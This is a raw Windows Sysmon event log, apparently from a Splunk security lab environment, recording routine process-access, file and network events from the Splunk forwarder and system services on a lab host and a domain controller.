ll.dll+51781 10341000x8000000000000000805806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.326{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.107{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77472AA1BA26B8C7BC0C28D97CDE40C6,SHA256=A494A5A8C8E3BB25ABD73CC65AD2DFA1FACEAACCDDCE5280DD05821BC7A77C41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:29.638{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E08A31266E0DC72D1251B166E6B4105,SHA256=B234B28D0154B21499A59E2ADC8D292A2E9B6241E0EFE7A08B02E0D5695CB208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:29.394{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E364F158382A6C04C3D1F30BB9B27918,SHA256=4628254D374182D19DEF03062CF846D8CE4BB6E90F4F6B4D0F3231F55258E2D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57133-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:29.372{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A42167B1ED28E7D060BCCEED1BB2D37,SHA256=5FEEDA971941CE546F980AAE85774E9D48B78D89A2633D8F2FFB6CECE6DD43A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:30.653{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9519A83D78096288710DD9A73A4A23D9,SHA256=C3E907491F127314BEEC03A0C5B9A615272331A8804E28A7A689617300E3D38C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:30.431{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67365BA9416A86532007F360710596F8,SHA256=34167DD7905ADF8C67BEB10332652C5E4433E5374977812AA560B15CFE48F66D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:30.044{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=829596DDDBC27ED4F24B2BFEEF61EAED,SHA256=606CC04E9FB34D0DA4FF68BF55D76FE50620BB129714C61B24C6F524D03D88BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:21.721{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50879-false10.0.1.12-8000- 23542300x8000000000000000805819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:31.685{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0A0988CC333073CCE48FBC68EC9AC45,SHA256=2354EBA5085C5940C4E358CCE37B7CA377331D9F22A19D5172ADA11BBE1E5AD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:31.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C67FF5AF8750403805B84DF90218B21,SHA256=1756651D2045306662A55356B5346A4C5A371D53F2B521A2903A5ADFD2A1DEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:32.685{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DA1D88C0B380D347DD181ECDA26352,SHA256=C5DA9ABD30F6144D3593B6525D562614B100DA9AF5665D6DBC8BA44CDACBD937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:32.460{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5BB7BA575C5C1C035D597DEAB369D25,SHA256=EDE6050EC3326B9991732C5CE2C7A6B194E615F3EF9D86FB04D093A7BDE8EF41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:33.697{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29833DA41FE7AD9F84F750425FF36EF2,SHA256=C5ED796942A6DEB12801F30D3A261BF2E7A1C72AB3CEE316BDFB6D74535D83B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:33.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95E623AC9BCA14A4610B2324AD9724F,SHA256=CC0207923E2BAAB360DECA2BBAD76308AEED0D84E4FAD08A8BA803F8288FC7DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:33.240{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57134-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:34.712{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60D9CD8EFA03DC848625BDF4672E575,SHA256=2322CE2A4C2397E1E5CF977638A5FF6DB06CF7043A5E44313C35B69232F69CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:34.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C875EFA5D3BCDE5F1B7E808F33EFD57A,SHA256=94317C31F28E059D18C892ECEC4A37A25F319A0860BE2391E6937967DC2B4C15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:35.743{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9428F1DACAE839338A22C452D928FF,SHA256=165F6A0B3755675E582C2A1C6651060A629543198EE823C4D497F8BA5BE2CE25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:35.526{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F785C4127BB8DFDD3DF37C15D698260D,SHA256=68466A0950CC08E3133B3955961F1834BCE0FA2B3526ABAC1639E4C33267B83D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:36.768{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A98AA6A3D498B79E23C28FEBB8AB83C3,SHA256=BFB61FA675B5A93BA9F236045BB631170A5528DBE4DBA617B6E33AA0974B02FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:36.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C256556DA80A205B860F3E5BFE5EA35D,SHA256=AE9BAB2012C896683C04B0A05D6FA48B92C93CF77A30911BA9EB9717363A3A20,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:27.747{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50880-false10.0.1.12-8000- 23542300x8000000000000000805826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:37.780{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E39FA31DD8672065FECCEDD9AE4038,SHA256=B79C1EA819FDCE4B31F674D334C342B543A949BF09847D3A868311BEBBF217A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:37.558{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=047244EB6C7B8096175952781769B100,SHA256=917D94EEAE42548D8595EAE4EDD08E00C1AD59118A387E444560B284EF201402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:38.814{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DE941FCD950857FBC354E2CD799FF66,SHA256=EEF46054DBBEE29688A56EF75BAEC17642937AEE64A153602F59E47D9C0D9584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:38.589{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C10373EB5C3A1E4441DD1F5517E0BBEC,SHA256=EEC78772466A94CD78E4C4942B90FFE85B37BE6D3E7551813C3CBA65C1DEDCBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:38.427{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5B11AAFF0C00D359A109141237949D39,SHA256=DCBAB330D956F0A9E4B8E3D5BF8697D63907D2834C335D3A2DDFD729D26F581C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:39.814{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B053D010ECA8EE8107DAA39E7FD4D111,SHA256=9B83A01A8A89D587F81667BACCDAE2DA93DDCE10C305521C5535D364944B2E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:39.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA6DC2AB622804D74D420099E8E61EAE,SHA256=044C4486C615D112062DA80789FCE1C433123C5173EDB0C7F5CA9A0ADAF3FF74,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:39.228{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57135-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:40.845{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50E9D1919F7B2B14ACFF01E4D3A582ED,SHA256=2E65CD0D37F6DE099ACEF434EA4EB329327568ED0809696C5CF3DAACB39F5A7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A29E1ACA6986D3319AE63801948DA467,SHA256=82031B55A4A982E6CDD35890B0FB53A379D88ACC9136CAAD77340297795C61C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:32.482{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net28601-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000805831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:41.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81FFB0740BFA5B1393AC106762DDE305,SHA256=81A573CCCDC76BD2F29EC11EC6E0258E4AFCE9B41C7DF7F86FC4EE68643393E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:41.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C8EA121C409BA7BC808890B95BF32AD,SHA256=2E7471FBCEFBC165443F734C0CB5503BF5B5DE95C78CBB9F55E101C7E871DBC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:41.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F0F38DA28A88832B17B5700073A183A,SHA256=8041AD64BA212FA8608D97E48CA5D7A37531564920B420ED57FB9C05C142BE16,IMPHASH=00000000000000000000000000000000falsetrue 